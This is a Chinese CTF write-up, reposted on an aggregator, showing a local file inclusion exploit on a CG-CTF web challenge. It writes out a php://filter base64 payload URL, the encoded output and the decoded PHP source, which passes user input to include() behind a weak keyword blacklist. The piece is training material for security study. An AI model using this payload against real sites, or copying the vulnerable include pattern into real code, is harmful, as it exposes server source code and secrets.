码迷,mamicode.com
首页 > 其他好文 > 详细

文件包含lfi

时间:2019-11-16 17:55:01      阅读:135      评论:0      收藏:0      [点我收藏+]

标签:LLC   filter   修改   str   encode   利用   web   base64   文件包含漏洞   

CG-CTF web(文件包含漏洞)

参考链接:https://blog.csdn.net/qq_34072526/article/details/89431431

php://filter 的使用:

参考链接:https://blog.csdn.net/destiny1507/article/details/82347371

php://filter 的应用:

1、利用base64获得源码

2、通过读写编码实行绕过操作

 

 

打开链接为下

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php

搜索以后发现:

“简单的文件包含,当发现url中有?file=字样时可以修改后面为?file=php://filter/convert.base64-encode/resource=xxx.php来查看对应文件源码”

这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag;

所以构造:

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到:

PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmK

CEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC

9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0

cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7C

gkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0

KCj8+CjwvaHRtbD4=

经在线网站base64解码后得:

<html>
    <title>asdf</title>
   
<?php
 error_reporting(0);
 if(!$_GET[file]){echo ‘<a href="./index.php?file=show.php">click me? no</a>‘;}
 $file=$_GET[‘file‘];
 if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
  echo "Oh no!";
  exit();
 }
 include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}
?>
</html>

 

文件包含lfi

标签:LLC   filter   修改   str   encode   利用   web   base64   文件包含漏洞   

原文地址:https://www.cnblogs.com/clqnotes/p/11872380.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!